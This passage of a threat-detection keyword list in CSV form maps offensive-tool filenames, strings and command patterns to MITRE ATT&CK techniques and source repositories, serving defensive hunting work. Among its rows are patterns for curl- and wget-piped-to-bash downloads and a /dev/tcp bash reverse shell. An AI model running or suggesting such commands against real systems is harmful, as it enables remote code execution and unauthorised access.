Bad-Pdf reads the NTLM hashes using Responder listener.","T1566.001 - T1189 - T1068 - T1207 - T1048 - T1003","TA0001 - TA0002 - TA0003 - TA0009 - TA0010 - TA0011","N/A","N/A","Credential Access","https://github.com/deepzec/Bad-Pdf","1","1","N/A","N/A","10","981","214","2020-08-19T06:54:51Z","2018-04-29T15:21:35Z" +"*BadPotato.cs*","offensive_tool_keyword","Earth Lusca Operations Tools ","Earth Lusca Operations Tools and commands","T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090","TA0007 - TA0008","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/BeichenDream/BadPotato","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*BadPotato.exe*","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1356","214","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z" +"*badpotato.exe*","offensive_tool_keyword","Earth Lusca Operations Tools ","Earth Lusca Operations Tools and commands","T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090","TA0007 - TA0008","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/BeichenDream/BadPotato","1","1","N/A","N/A",,"N/A",,, +"*badtouch*","offensive_tool_keyword","badtouch","Scriptable network authentication cracker","T1110 - T1210.001 - T1558.003","TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://github.com/kpcyrd/badtouch","1","0","N/A","N/A","4","363","44","2022-03-24T09:53:51Z","2018-03-15T22:27:56Z" +"*BadUSB_AddAdmin.ino*","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","132","64","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" +"*BadUSB_DownloadExecute.ino*","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","132","64","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" +"*BadUSB_FacebookPost.ino*","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). 
Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","132","64","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" +"*BadUSB_HideWindow.ino*","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","132","64","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" +"*BadUSB_LockYourComputer.ino*","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","132","64","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" +"*BadZure-main*","offensive_tool_keyword","badazure","BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/mvelazc0/BadZure/","1","1","N/A","5","4","302","18","2023-07-27T15:40:41Z","2023-05-05T04:52:21Z" +"*bananaKitten.exe*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*BaRMIe*","offensive_tool_keyword","BaRMIe","BaRMIe is a tool for enumerating and attacking Java RMI (Remote Method Invocation) services.","T1522 - T1070 - T1573 - T1071","TA0001 - TA0003 - TA0008 - TA0011","N/A","N/A","Information Gathering","https://github.com/NickstaDB/BaRMIe","1","0","N/A","N/A","7","692","107","2017-09-28T22:38:02Z","2017-09-24T18:54:12Z" +"*baron-samedit-heap-based-overflow-sudo.txt*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*base64_conversion_commands.ps1*","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","1","N/A","N/A","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" +"*base64_conversion_commands.ps1*","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs/","1","1","N/A","6","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" +"*bash -c *curl *.sh | bash*","greyware_tool_keyword","bash","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - 
T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Exploitation tools","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*bash -c *wget *.sh | bash*","greyware_tool_keyword","bash","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Exploitation tools","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*bash -i >& /dev/tcp/*/* 0>&1*","greyware_tool_keyword","bash","bash reverse shell ","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","greyware tool - risks of False positive !","N/A","10","51199","13280","2023-10-04T17:25:07Z","2016-10-18T07:29:07Z" +"*bash -i >& /dev/tcp/*/* 0>&1*","greyware_tool_keyword","bash","bash reverse shell","T1071 - T1071.004 - T1021","TA0002 - TA0011","N/A","N/A","C2","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","10","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*bash lse.sh*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"*bash_executor *","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - 
TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","0","N/A","10","10","11","6","2023-06-30T16:35:47Z","2022-09-28T17:20:04Z" +"*bash_read_line_reverse_tcp.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*bashfuscator -*","offensive_tool_keyword","Bashfuscator","A fully configurable and extendable Bash obfuscation framework","T1027 - T1027.004 - T1059 - T1059.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Bashfuscator/Bashfuscator","1","0","N/A","10","10","1348","159","2023-09-05T10:40:25Z","2018-08-03T21:25:22Z" +"*Bashfuscator Team*","offensive_tool_keyword","Bashfuscator","A fully configurable and extendable Bash obfuscation framework","T1027 - T1027.004 - T1059 - T1059.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Bashfuscator/Bashfuscator","1","0","N/A","10","10","1348","159","2023-09-05T10:40:25Z","2018-08-03T21:25:22Z" +"*bashfuscator.py*","offensive_tool_keyword","Bashfuscator","A fully configurable and extendable Bash obfuscation framework","T1027 - T1027.004 - T1059 - T1059.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Bashfuscator/Bashfuscator","1","1","N/A","10","10","1348","159","2023-09-05T10:40:25Z","2018-08-03T21:25:22Z" +"*Bashfuscator-master*","offensive_tool_keyword","Bashfuscator","A fully configurable and extendable Bash obfuscation framework","T1027 - T1027.004 - T1059 - T1059.004","TA0005 - TA0002","N/A","N/A","Defense 
Evasion","https://github.com/Bashfuscator/Bashfuscator","1","1","N/A","10","10","1348","159","2023-09-05T10:40:25Z","2018-08-03T21:25:22Z" +"*BasicServiceExploit.class*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*BastilleResearch*","offensive_tool_keyword","Github Username","Open source testing tools for the SDR & security community","T1179 - T1141 - T1142 - T1143","TA0011 - ","N/A","N/A","Exploitation tools","https://github.com/BastilleResearch","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*--batch --dump -T *","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*Bates.exe --kill*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed 
.NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","0","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" +"*Bates.exe --listen*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","0","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" +"*bats3c/ADCSPwn*","offensive_tool_keyword","ADCSPwn","A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service","T1550.002 - T1078.003 - T1110.003","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bats3c/ADCSPwn","1","1","N/A","10","8","749","119","2023-03-20T20:30:40Z","2021-07-30T15:04:41Z" +"*bats3c/darkarmour*","offensive_tool_keyword","darkarmour","Store and execute an encrypted windows binary from inside memorywithout a single bit touching disk.","T1055.012 - T1027 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/darkarmour","1","1","N/A","10","7","644","119","2020-04-13T10:56:23Z","2020-04-06T20:48:20Z" +"*bats3c/DarkLoadLibrary*","offensive_tool_keyword","DarkLoadLibrary","LoadLibrary for offensive operations","T1071.001 - T1055.002 - T1055.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/DarkLoadLibrary","1","1","N/A","10","9","875","184","2021-10-22T07:27:58Z","2021-06-17T08:33:47Z" +"*bats3c/EvtMute*","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense 
Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","240","46","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" +"*bawait_upload*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" +"*bawait_upload_raw*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. 
thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" +"*bb3b1a1f-0447-42a6-955a-88681fb88499*","offensive_tool_keyword","Jatayu","Stealthy Stand Alone PHP Web Shell","T1071","TA0005","N/A","N/A","Shell spawning","https://github.com/SpiderMate/Jatayu","1","1","N/A","N/A","1","31","8","2019-09-12T17:03:13Z","2019-09-12T09:04:10Z" +"*bbcd54496dca975abf6089526023446984238d464e2df7485230b76072ff2ea1*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*bbce2e4fa4cbb392974e7276108f1f9091f31e806a2c81964c996953e0770125*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows 
AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*bblcccknbdbplgmdjnnikffefhdlobhp*","greyware_tool_keyword","FastStunnel VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*bblockdlls*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" 
+"*bbrowserpivot*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*bbrowserpivot*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - 
T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*bbypassuac*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*bc3023b36063a7681db24681472b54fa11f0d4ec*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - 
T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*bcc2_setenv*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" +"*bcc2_spawn*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. 
thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" +"*bcdedit* /set {default} bootstatuspolicy ignoreallfailures*","greyware_tool_keyword","bcdedit","Bcdedit is a command-line tool that enables users to view and make changes to boot configuration data (BCD) settings in Windows systems. Adversaries may leverage bcdedit to modify boot settings. such as enabling debug mode or disabling code integrity checks. as a means to bypass security mechanisms and gain persistence on the compromised system. By modifying the boot configuration. 
